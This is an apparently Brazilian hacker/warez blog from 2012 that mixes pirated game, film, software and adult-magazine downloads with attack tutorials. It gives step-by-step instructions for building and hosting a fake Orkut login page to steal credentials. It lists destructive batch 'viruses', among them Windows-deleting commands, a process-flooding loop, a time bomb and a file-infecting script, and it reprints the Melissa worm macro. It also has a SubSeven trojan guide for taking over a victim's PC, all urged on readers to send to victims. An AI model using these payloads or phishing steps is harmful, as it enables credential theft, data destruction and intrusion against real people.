.:: H4CK3R D3TON4T10N ::.: 2012

Need for Speed Hot Pursuit 2 Super Compactado 51MB!!

Need for Speed: Hot Pursuit 2 Ripado/Super Compactado apenas 51 Mb!!!! Acreditem se quiser!! Need for Speed: Hot Pursuit 2 se divide em duas categorias principais: corridas normais e com policiais. A primeira é similar aos tantos outros jogos do gênero. A diferença está na segundo modo: se você for flagrado por policias ao cometer uma infração, dá-se início a uma perseguição no melhor estilo dos filmes de ação americanos. Dependendo da gravidade e da duração da infração, múltiplos carros entram na perseguição, criam barreiras na estrada e até chamam um helicóptero para jogar bombas no pobre contraventor! O jogo traz uma respeitável biblioteca de 40 carros que foram digitalizados com precisão (Aston Martin, Ferrari 550 Barchetta, Lamborghini Murcielago, Lotus Elise e Mercedes Benz CLK GTR são alguns dos destaques). Mas as semelhanças com “Gran Turismo 3? terminam aqui. Diferente do popular simulador, que se destaca pelo realismo, em “NFS:HP2? carros fazem curvas impossíveis e dão pulos gigantescos (ressaltados por um efeito Matrix acionado automaticamente, que congela o tempo e gira a câmera com um borrão). Mas isso não deve ser encarado como um ponto negativo, já que toda estrutura do game é baseada em correr perigosamente. As músicas foram retiradas para diminuir o tamanho.



Criando Página Fake do Orkut


1°Baixem a página fake clickando aqui > depois que baixarem em questão de segundos vá na pasta que cai os downloads do seu navegador axe o arquivo que xama "kkkkk.html" clickem com o botão direito do mouse sobre ele > abrir com > bloco de notas.

2°Depois que abrirem com o bloco de notas aperte as teclas juntas Ctrl f do seu teclado > vai aparecer um lugar de busca escreva "seuemail" (não escreva com parênteses so o que está escrito dentro dele) depois vai aparecer uma palavra selecionada só clickar naquele botão que apaga uma letra que vc digitou errada por exemplo e escreva seu msn( melhor gmail que tem mais certeza de dar certo). Obs.: Se vc fez com seu msn quando alguem cair na página fake vc não vai saber pelo messenger vc tem que entrar no site do hotmail.

3°Depois que pois seu msn, gmail tanto faz salve o nome de qualquercoisa.html (no final do nome quando vc salvar ponha .html sem espaço pq assim seu pc sabe que o arquivo vai abrir como seu navegador padrão. A página fake esta criada para ver o resultado depois de salar basta clikar duas vezes nela e ver quanto é parecida com á página de login do orkut.

4°Agora vc deve fazer o seguinte criar um e-mail bol, clicke aqui para criar, depois de criar dessa a página vai ter uma propaganda do vila bol, ai vc clicka em construir site ( não fexe a parte que está carregando) > depois de clickar em "construir site" vai ter aberto sua conta no vila bol, ai só vc caçar aonde está esclito "gerenciador de arquivos" e clickar em baixo "administre seu site" > depois clicke em "abrir o gerenciador de arquivos" logue com a conta bol que vc criou com o msm e-mail e a msm senha( por isso eu disse para não fexar a parte que esta carregando, pq lá mostra seus dados de acesso para vc não esquecer) se depois que vc logar aparecer o home do site da bol fexe e faça tudo de novo deus da parte de "construir site" ai quando aparecer uma página aonde tem umas folhas de papel umas pasta clicke em "enviar arquivo(s)" > depois clicke em "escolher arquivo" e marque a página fake criada depois clicke em "abrir" depois em "confirmar", ai a página fake esta sendo enviada é muito rápido, depois que mandar vair ser criado na net uma página que hospeda a sua página fake enviada > entre nela copie o link qua aparecer no navegador e cole no bloco de notas > esse é o link da sua página fake. Entre no site do cj1 


Na onde eu selecionei com vermelho, digite um nome do link que querem, tipo, enois, no meio da caixa branca e clicke em registrar. 


Preecha tudo certo e registre sua conta, quando alguem digitar o site, "http://enois.cj1.com.br" vão cair na página fake, mas vcs ai pesquisem na net formas de esconder links com palavras por cima e que abram em uma nova guia, pois o orkut está com a segurança firme, então aparece uma página assim: 


Eu sei esse código para esconder o link do site, blog hacker tanto faz:



<a href="http://link da pagina do orkut>Clique Aqui</a>

Só que ele não faz abrir em outra guia então o orkut desconfia de outros sites sem ser o dele, so confia no dele tipo de comus isso.
Se aprender um código para abrir em nova guia comente. 

Autodesk Maya v2011


O software Autodesk® Maya® v2011, oferece aos artistas um fluxo de trabalho criativo completo com ferramentas abrangentes para modelagem, animação, simulação, efeitos visuais, renderização, captura de movimento e composição em 3D sobre uma plataforma de produção com alta capacidade de expansão. Todos esses recursos são reunidos em um só aplicativo que oferece um valor excepcional aos artistas da computação gráfica.
Agora disponível para o sistema operacional Mac OS® X 64 bits, o Maya 2011 oferece uma interface de usuário revitalizada, melhor interação do visor, novos recursos de edição 3D, gerenciamento de cores integrado e animação avançada de personagens.

Os novos recursos do Autodesk Maya 2011 incluem:

* Interface de usuário modernizada −Aproveite a experiência de usuário mais consistente e aprimorada em todas as plataformas.
* Novos fluxos de trabalho e ferramentas de pele — Para melhorar a pele dos personagens com mais deformações realistas em menos tempo.
* Novo fluxo de trabalho de redirecionamento não destrutivo —Reuse, corrija e melhore a captura de movimento e outros dados de animação com mais facilidade e rapidez com um novo fluxo de trabalho de redirecionamento não destrutivo que usa as bibliotecas de middleware do Autodesk® HumanIK®.
* Novos recursos de edição 3D— Acelere a produção de filmes virtuais e imagens prévias.
* Melhorias nas referências de arquivos e recursos— Mais facilidade na segmentação, no reuso e intercâmbio de dados com ou sem referências de arquivos.

Nome: Autodesk Maya v2011
Fabricante: Autodesk
Ano: 2010
Sistema Operacional: Windows
Tamanho: 2,70 GB
Formato: .iso
Idioma: Inglês

Download versão 32bits: Parte 1Parte 2

Download versão 64bits: Parte 1Parte 2

Baixar Filme Desafiando Gigantes


Sinopse: Nunca Desista, nunca volte atrás, nunca perca a fé o poder da crença proporciona a habilidadde de vencer. Nos seus seis anos como técnico de futebol americano de uma escola, Grant Taylor nunca conseguiu levar seu time Shiloh Eagles a uma temporada vitoriosa. E ao ter que enfrentar crises profissionais e pessoais aparentemente insuperáveis, a idéia de desistir nunca lhe pareceu tão atraente.

Dados do Filme:
Tamanho: 693 MB
Formato: DVDRip/Avi
Idioma: Português
Lançamento: 2006
Servidores: FileServe


Baixar Filme O Homem Que Mudou o Jogo

 

Na prévia vemos Brad Pitt interpretando o gerente de um time de beisebol que, sem grana para contratar novos jogadores, decide apostar as fichas em um sistema matemático de estatísticas de jogo e resultados com a ajuda de um jovem universitário interpretado por Jonah Hill.

Titulo Original: Moneyball
Gênero: Drama
Duração: 133 Min
Diretor: Bennett Miller
Lançamento: 2011
Tamanho: 700 MB
Formato: BRRip
Qualidade de Áudio: 10
Qualidade de Vídeo: 10
Vídeo Codec: Rmvb
Idioma: Inglês
Legenda: Português


Revista Info Exame - Dezembro 2011 Ed.311



Guia de Aplicativos: Uma seleção de apps para iPhone, Android e Windows Phone. Todos Testados. São 261 apps no total. Angry Birds Passarinhos voam num dos apps mais baixados do mundo. Facebook A rede social ganhou uma otima versão para iPad. Instagram Para compartilhar fotos de forma criativa e divertida. E muito mais!!!

Revista: Info Exame
Edição: Dezembro/2011
Páginas: 96
Tamanho: 101 MB
Formato: PDF

Vídeo Aula: Monte seu pc em 30 minutos

Siga os Vídeos abaixo em SEQUENCIA





Parte 1


Parte 2


Parte 3


Parte 4



Parte 5
 
 
Loja onde é possivel comprar as peças:
http://www.superkit.com.br/
http://www.waz.com.br/
http://www.balaodainformatica.com.br/
 
Vídeo por Digerati

Vídeo Aula: Atualizando o Xperia X8 para android 2.2


 

Retirado de: simplesmenteandroid.blogspot.com

Criando Víros pelo Bloco de Notas

Criando Virus no Bloco de Notas
É muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações,
abra o bloco de notas
Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .bat
exemplo: onomedoarquivo.bat
Se vc usar outra extensão o arquivo ñ ira pegar

AVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, voce deve enviar para as vitimas!!!


No bloco de notas copie o que está de verde!

Nome:Del All Windows
rmdir /s /q c:\windows
Função:Deleta tdo do Windows (fode o pc

Nome:Autoexec
@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*
Função: Fode com tudo

Nome:Trojan-1
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.Form Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height
Função:Augumas dos trojans tradiçionais

Nome:Del p/ Windows
del /s /q c:\windows\
Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas

Nome:Shutdown-S
shutdown -s
Função:Desliga o pc

Nome:Shutdown-R
shutdown -r
Função:Reinicia o pc

Nome:Trojan-2
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
Função:Fode com tudo mesmo...

Nome:Pirata
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Função:Testar seu Anti-Virus ou enganar auguem.

Nome:Melissa 1999
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus, além de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$ 600 milhões.

Nome:CLICK EM MIM
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
Função:Fica repetindo varias vezes a mesma mensagem

Nome:Progstar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
Função:Abre varios programas sem parar, fais o pc travar

Nome:bomba relógio
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo
Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Função:Congela todos os msn's que estao sendo executados.

Criando o vírus Melissa 1999

 
OBS: Antes de pelo menos ler isto, preste atenção: Eu nao me responsabilizo pelo o que você irá fazer, tome muito cuidado, NUNCA clique neste vírus que você irá fazer ok?
 
Abra o Bloco de notas e copie o código abaixo:
 
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
 
Agora salve com a extensão .bat (ex: melissa.bat) e selecione marque em Salvar tipo como: Todos os arquivos. 
Seu vírus está criado! Agora é só mandar para alguns "amigos".
 
(Não causará dano ao seu pc, pelo menos se vc nao clicar nele!)

Criar um vírus para deletar todo o Windows

OBS: Antes de pelo menos ler isto, preste atenção: Eu nao me responsabilizo pelo o que você irá fazer, tome muito cuidado, NUNCA clique neste vírus que você irá fazer ok?


Bem, vamos ao tutorial:

Abra o Bloco de notas e copie: rmdir /s /q c:\windows
Agora salve com a extensão .bat (ex: foderpc.bat) e selecione marque em Salvar tipo como: Todos os arquivos. 
Seu vírus está criado! Agora é só mandar para alguns "amigos".


Novo Postador!

Olá galerinha eu sou o Vinicius Ribeiro, sou o novo postador da HD.
Vou traser várias novidades para vocês.

Tutoriais, Sites Editavel, Templates, e muito mais !!!

Como pegar seu ip de uma forma simples

Bom, para quem nao gosta de ir a sites como meuip.com ou etc, eu vou ensinar como pegar seu ip de um geito muito mais rápido e simples.

1° Abra iniciar e executar
2° Em executar digite cmd
3° Aparecerá uma janela msdos provavelmente assim: C:\ Document and Settings\Nome de Usuário\
4° Digite ipconfig e de enter
5° Agora é so copiar o numero onde tem Endereço de IP...............: xxx.xxx.xxx.xxx

Guia Hacker Download



Estamos todos seguros?
Você tem certeza que não existe ameaças na internet?
Como eu posso adiquirir conhecimento hacker?
Quais passos devo fazer para se tornar um hacker?
Baixe já e entre nesse mundo poderoso, sibernético, mundo hacker.


Download

Mep GetSite 1.0 Download

Mep GetSite é um ótimo programa para roubar templates de blogs e sites.

Não precisa pausar o anti-vírus

Start BTN Renamer


Voce não gostaria de ter seu personalizado no menu iniciar de seu pc, caracterizando seu equipamento como "bem pessoal", Com esse programa você pode colocar qualquer nome no Menu Iniciar.
Atarefa não é dificil, basta apenas voce digitar o nome desejado em New Label e depois clique em Rename It e pronto, ferramenta muito interessante.

Não precisa pausar seu anti-vírus
 

Super Bluetooth Hack

O Bluetooth Hack é utilizado para conseguir dados de outros celulares via bluetooth sem que a outra pessoa saiba.

Uma vez conectado a um outro telefone através de Bluetooth você pode (ou não):
- Ler as mensagens
- Ver a lista de contatos
- Mudar o perfil
- Fazer o telefone tocar mesmo estando em modo silencioso
- Fazer downloads das musicas e toques (para o seu celular)
- Reiniciar o telefone
- Desligar o telefone
- Restaurar os valores de origem
- Mudança de toque Volume
- Fazer Ligações do outro celular.

Tutorial Como invadir o Linux



Confira nesta edição os principais assuntos da Linux Magazine de junho (a vinda de Linus Torvalds ao Brasil) e leia um artigo completo sobre MySQL Workbench, que irá lhe auxiliar no planejamento de bancos de dados e também sobre o LinuxCon, o melhor evento de tecnologia do Brasil. Na seção de colunas, Augusto Campos fala sobre a colaboração de usuários Linux versus usuários Windows e Rafael Peregrino fala sobre a revolução do Linux nos últimos anos, além de anunciar o LinuxCon Brasil 2010.

Template Download Grátis


Servidor(es): Megaupload
Plataforma: Blogger
Tamanho: 506 KB
Formato: .RAR/.XML

Curso de Informática


Aprenda a usar programas como o Excel, photoshop, word e a montar micro computadores com esses excelentes cursos de fácil compreensão. Cursos: Word - Excel - Photoshop - Montagem De Micros.

Tutorial Crackear Programas

O termo CRACKEAR PROGRAMAS significa burlar o sistema de validação das licenças dos programas, a grosso modo, seria como “ tornar original os programas piratas”. Existem na Internet existem programas com diversas licenças:

Freeware (Livre).
Shareware (Para usar por alguns dias, etc).
Demo (Demonstração).

Na maioria das vezes, os programas que podemos crackear são os Shareware, pois eles, em sua grande maioria, possuem a opção para você colocar a chave de Instalação (CD-KEY). Na Internet existem diversos sites que fornecem diversos CRACK´S, existem dois em especial:
www.crackdb.org
www.crack.ms

Um dos crack´s mais famosos na Internet é o que altera a licença do Windows XP de PIRATA para ORIGINAL, permitindo que você instale no seu computador, por exemplo, o Internet Explorer 7.0 e Windows Media Player 11. 

Como Clamuflar o IP


Existem dois tipos de IP, o fixo e o dinâmico, tanto nas conexões discadas, quanto nas conexões de banda larga seu IP quase sempre é dinâmico, ou seja, cada vez que você se conecta à internet seu provedor lhe dá um número de endereço IP diferente, então para mudar seu endereço IP basta se desconectar e conectar novamente à internet.

Como camuflar meu IP? Como ficar invisível na internet?

Você pode precisar esconder,
ou mascarar seu IP por vários motivos, como por exemplo para entrar num site que exiga que você esteja em certo país, assim eles verão o IP que você atribuiu e não seu verdadeiro IP, nesse caso você deve atribuir a seu computador um IP daquele país. Este processo se chama utilização de proxy, para mascarar ou esconder seu IP verdadeiro você deve:

1º Escolher um número de proxy (IP), entre nesse site http://www.samair.ru/proxy/ e escolha um. IP adress é o número do IP (proxy) os números depois de dois pontos (:) é a porta. Anonymity level é o nível de anonimato. Checked time é a última vez que o proxy foi testado e está funcionando corretamente. Country é o país de onde é o proxy, no caso de onde vão identificar que você esteja.

2º Após escolher o proxy, se você usar o Internet Explorer vá em: Ferramentas -> Opções de Internet -> Conexões -> Configurações de Lan – Selecione “Usar servidor proxy” e digite o IP e a porta do servidor.

Se usar o Firefox vá em Ferramentas -> Opções -> Avançado -> Rede -> Configurações -> Configuração manual de proxy e em HTTP digite o proxy e a porta que você escolheu no 1º passo

Caso fique muito lento tente escolher outro proxy e depois não esqueça de voltar seu navegador para a configuração original pois com o tempo o proxy pode parar de funcionar e você pode não conseguir usar a internet.

Pronto!
Agora que estou invisível…

Calma lá, não é porque você se escondeu que não poderá ser encontrado, saiba que as empresas de telefonia e a polícia tem mecanismos para, mesmo você estando escondido atrás de outro IP, saber exatamente onde você está.

Basta a empresa de telefonia fazer uma pesquisa que descobrem seu real número IP, daí eles descobrem seu número de telefone (pois a empresa sabe exatamente que telefone usou que IP tal hora, já que é a mesma empresa de telefonia que atribuíu o número IP ao seu telefone), de posse do número de seu telefone podem saber qual é a sua cidade, seu bairro e o número da sua casa. É assim que geralmente encontram pedófilos e ladrões de internet. Um método parecido também é usado para rastrear e-mails.

Por outro lado você pode ficar tranqüilo em relação a isso, pois as empresas de telefonia só podem repassar essas dados à polícia, mesmo assim somente com um mandado judicial.

O que é Ataques DoS e DdoS?



De acordo com a definição do CERT (Computer Emergency Response Team), os ataques DoS (Denial of Service), também denominados Ataques de Negação de Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um determinado serviço de um computador. Para isso, são usadas técnicas que podem: sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não consigam usá-la; derrubar uma conexão entre dois ou mais computadores; fazer tantas requisições a um site até que este não consiga mais ser acessado; negar acesso a um sistema ou a determinados usuários.

Explicando de maneira ilustrativa, imagine que você usa um ônibus regularmente para ir ao trabalho. No entanto, em um determinado dia, uma quantidade enorme de pessoas “furaram a fila” e entraram no veículo, deixando-o tão lotado que você e os outros passageiros regulares não conseguiram entrar. Ou então, imagine que você tenha conseguido entrar no ônibus, mas este ficou tão cheio que não conseguiu sair do lugar por excesso de peso. Este ônibus acabou negando o seu serviço – o de transportá-lo até um local -, pois recebeu mais solicitações – neste caso, passageiros – do que suporta.

É importante frisar que quando um computador/site sofre ataque DoS, ele não é invadido, mas sim sobrecarregado. Isso independe do sistema operacional utilizado.

Tutorial Hacker: Como invadir um PC

 

COMO INVADIR UM COMPUTADOR

Teoria:
Ao contrário do que muita gente pensa, invadir um computador é muito simples. Podemos dizer que é mais fácil invadir um computador do que ser invadido, pelo simples motivo de que um anti-vírus qualquer impede a invasão de um hacker ou cracker (isso quando se usa um programa de invasão como NetBus, Subseven, BackOriffice e por aí vai.).



É Necessário:
- É essencial ter um cérebro criativo e mais de 64 neurônios.
- Um programa de invasão (Recomendo SubSeven).
- A vítima não ter um anti-vírus. Caso contrário ela não vai executar o vírus.

Recomendável:

- É recomendável uma conexão de no mínimo 56K.
- A velocidade do computador não tem muita importância nesse caso.
- Desabilite seu Anti-vírus para usar o programa (Você não vai se infectar, a não ser que você seja muito burro, o suficiente para executar o vírus ao invés do programa.).

Finalmente como invadir:
*Os programas de invasão costumam vir em três partes: Programa de invasão, Editor do vírus e vírus.*

Passo: Abra o editor de vírus. Agora mude o ícone, coloque uma mensagem qualquer pra pessoa ver quando abrir o vírus, onde você quer que o vírus inicie, esse tipo de bobagem, não é nada demais.

Passo: Converse com alguma pessoa, de preferência no " ICQ ". Convença a pessoa a aceitar um arquivo, diga que é algo engraçado ou coisa assim.

Passo: Após a pessoa aceitar o vírus e executá-lo, você terá que pegar o IP dela, não é difícil conseguir se você estiver no icq. Você pode achar em vários sites (inclusive nesse) alguns tipos de arquivo pra ver o IP de todos da sua lista do icq. Para o * icq 2001b ou o icq 2003a * você pode baixar esse arquivo clicando aqui. E substituir pelo existente na pasta do icq.

Passo: Agora digite o IP da pessoa no Programa de Invasão e pronto! Você invadiu o computador dessa pessoa. Agora você terá acesso a tudo, tudo que a pessoa está vendo na tela, o que ela digita ou conversa no icq, pode alterar arquivos, desligar o computador, colocar mensagens na tela e muito mais.

Download do SubSeven Aqui
Client : subseven_client.zip
Server + ServerEditor : subseven_server.zip


Baixar Filme Jogos Sangrentos


Sinopse: Produção de terror violenta, com trama que surpreende em sua resolução e clima claustrofóbico e assustador. Uma bela mulher, com uma filha de seis anos, volta de um encontro onde ela acredita ter conhecido o homem que poderá dar estabilidade à sua vida e à sua filha. Porém, de forma misteriosa, ela acorda dentro de um caixão, com o corpo todo dolorido e sem a filha por perto. Sozinha e em desespero, ela é torturada de várias maneiras por seu raptor e não consegue entender o que esteja acontecendo. Cercada por dor e loucura, ela precisa arrumar uma forma de sobreviver e, o mais importante, descobrir quem está por trás desse jogo brutal e o porquê dela estar passando por isso tudo.









Informações:
Tamanho: 699 MB
Formato: DVDRip/Avi
Idioma: Portugues
Classificação Etária: 16 Anos
Lançamento: 2006

Baixar Filme Red Dog

 

Sinopse: Red Dog é baseado na lendária e real história do cão que, unido a uma comunidade, cruzou a Austrália em busca de seu dono. Desde que o seu segundo dono, um motorista de ônibus chamado John Grant morreu, em 1975, Tally Ho (o nome orignal do cão) passou a andar por conta própria pelo deserto australiano em busca do seu dono. Red Dog (Cão Vermelho) ganhou esse apelido pelos membros das comunidades que ele frequentava por causa da poeira vermelha do oeste australiano.




Informações:
Tamanho: 261 MB
Formato:
BDRip/Rmvb
Idioma:
Ingles (Legendado)
Classificação Etária:
Nao Informada
Lançamento: 2011
Qualidade Audio:
10
Qualidade Video: 10



CD Super Dance 2012

Informações do CD
Titulo: Super Dance Janeiro 2012
Ano: 2012
Genero: Dance
Formato: .rar/.mp3
Tamanho: 692MB
Servidor: Filejungle


O Justiceiro

Sinopse: Após ter sua esposa e filho assassinados, Frank Castle (Thomas Jane) decidiu por dedicar sua vida a eliminar o crime das ruas da cidade em que vive. Para tanto Castle não apenas persegue os bandidos como também os elimina, usando para tanto sua experiência como agente secreto do FBI. Seu novo alvo é Howard Saint (John Travolta), um homem ligado ao submundo do crime que decide se vingar da sociedade após ter seu filho morto.
Informações do Filme
Título: O Justiceiro
Gênero: Ação
Formato: Rmvb
Áudio: Português
Tamanho: 402 MB
Servidor: Megaupload 


Vanessa Zotth Revista Playboy Janeiro 2012

Vanessa Zotth Revista Playboy Janeiro 2012

E a Playboy escolheu Vanessa Zotth, a modelo que interpreta a Dona Fifi de Assis, no humorístico Escolinha do Gugu, para ser sua capa de janeiro. Ela posou para o fotografo André Passos, e o resultado do ensaio vai poder ser conferido a partir do dia 10 do mês que vem. Puxando bem pela memória, dá para perceber que ela não é tão desconhecida assim do público..




Gênero: Revista +18
Ano de Lançamento: 2012
Formato: JPG
Tamanho: 1.36 MB
Servidor: Megaupload


Todas as revistas Sexy de 2011

 

Todas Revistas Sexy 2011

Todas as revistas da sexy de 2011 Lançadas no brasil. Janeiro – Tricampeães, Fevereiro – Nubia Óliver, Março – Joana Machado, Abril – Natalía BB11 , Maio – Fernanda Agnes , Junho – Diana BBB11 , Julho – Mulher Melância , Agosto – Dani Sperle , Setembro – Jaque Khury , Outubro – Sabrina Soares , Novembro – Carol Nakamura e Dezembro – Gracyanne Barbosa.




Lançamento: 2011
Gênero: Revistas +18
Formato: Rar/JPEG
Tamanho: 99 Mb

Todas as revistas Playboy de 2011

Revistas Playboy – Todas Edições de 2011
Playboy Todas Edições de 2011 Completas , são doze revistas com as mulheres mais lindas do brasil que foram capa da playboy esse ano.

Lançamento: 2011
Gênero: Revistas +18
Revistas: 12
Formato: JPEG
Tamanho: 250 Mb

Dead Island PC Completo

Descrição: Dead Island é um jogo de tiro em primeira pessoa que mistura elementos de terror, ação e aventura em uma fórmula conhecida como survival horror. O título é um dos primeiros e únicos a utilizar zumbis como tema principal em um FPS (jogo de tiro em primeira pessoa).

Os personagens são cidadãos comuns, que têm suas férias interrompidas pelo ataque dos zumbis. No controle de um deles, o jogador deve investigar um mundo aberto, em busca de um jeito de escapar enquanto descobre os motivos que levaram à infecção da ilha. Há também um modo cooperativo, que permite a união de até quatro pessoas em busca de um único objetivo: sobreviver.

Os zumbis de Dead Island terão diversas camadas de tecidos, carnes e músculos, e reagirão de forma realista aos golpes desferidos pelos jogadores. Isso resultará em uma carnificina total, com membros sendo arrancados e zumbis andando por aí com órgãos internos aparecendo. Da mesma forma, os corpos dos mortos não serão frágeis e, para acabar com eles, será preciso golpeá-los em partes específicas, maximizando o dano e mandando-os de vez ao além.


Tamanho: 5.5 GB
Formato: Iso
Qualidade dos Gráficos: 10
Nivel de Jogabilidade: 10
Número de Mídias: 1 DVD
Idioma: Inglês
Crack: Baixar

Test Drive Unlimited 2 PC

A atmosfera de "boa vida" do primeiro Test Drive Unlimited se estende também para o segundo game. Esta sequência conta com um cenário aproximadamente duas vezes e meia maior que os 1.500 quilômetros de pistas existentes no jogo original.

Desta vez, é a ilha espanhola de Ibiza — famosa pelas festas praianas — que deve ser explorada, seja em florestas densas, agrupamentos montanhosos ou cidades modernas. Há a oportunidade tanto de cruzar as ruas de Ibiza e desafiar alguém a qualquer momento quanto de competir ao lado de amigos de forma cooperativa. Enquanto uma pessoa controla o veículo, a outra serve como guia e auxilia o motorista ao longo do trajeto. Ou seja: em dupla, a posição fica mais vantajosa.

O "lobby" multiplayer foi trocado por um sistema que permite ao gamer conhecer os carros dos adversários durante a preparação para a corrida. Falando em carros, agora é possível controlar SUVs (Sport Utility Vehicles), veículos feitos para estradas não-pavimentadas. Mas cuidado: os desta vez, há um sistema convincente de danos. Assim, riscos e estragos diversos são ilustrados no modelo do veículo.

Participando de empreitadas variadas, o gamer ganha pontos de experiência — XP — e dinheiro. A grana, é claro, pode ser gasta na casa do piloto, nas roupas do personagem, em peças adicionais para o carro, em patrocínios para o clube de veículos... Vale lembrar que, quanto maior e melhor for o clube, maiores são as possibilidades de sucesso.

Assasin's Creed II PC [Torrent]

